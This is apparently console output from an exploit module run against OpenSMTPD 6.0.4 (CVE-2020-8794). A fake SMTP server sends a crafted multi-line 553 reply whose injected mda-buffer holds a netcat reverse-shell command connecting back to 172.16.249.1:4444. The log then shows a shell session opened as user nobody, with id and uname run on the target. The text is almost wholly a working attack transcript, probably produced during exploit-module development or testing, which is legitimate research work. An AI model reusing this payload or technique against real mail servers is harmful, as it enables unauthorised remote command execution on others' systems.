[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794
[*] Started service listener on 0.0.0.0:25
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'nozahdogyxewkv@[172.16.249.1]' < /dev/null && echo true
[*] Client 172.16.249.138:10203 connected
[*] Exploiting old OpenSMTPD grammar for a nobody shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[+] Received: EHLO
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[+] Received: foo.localdomain
MAIL FROM:<w
[*] Sending: 553-
553

type: mda
mda-method: mda
mda-usertable: <getpwnam>
mda-user: nobody
mda-buffer: mkfifo /tmp/jszy; nc 172.16.249.1 4444 0</tmp/jszy | /bin/sh >/tmp/jszy 2>&1; rm /tmp/jszy; exit 0

[*] Disconnecting client 172.16.249.138:10203
[*] Command shell session 4 opened (172.16.249.1:4444 -> 172.16.249.138:40377) at 2020-03-03 18:41:06 -0600
[*] Server stopped.

id
uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
uname -a
OpenBSD foo.localdomain 6.3 GENERIC#100 amd64
```

#12889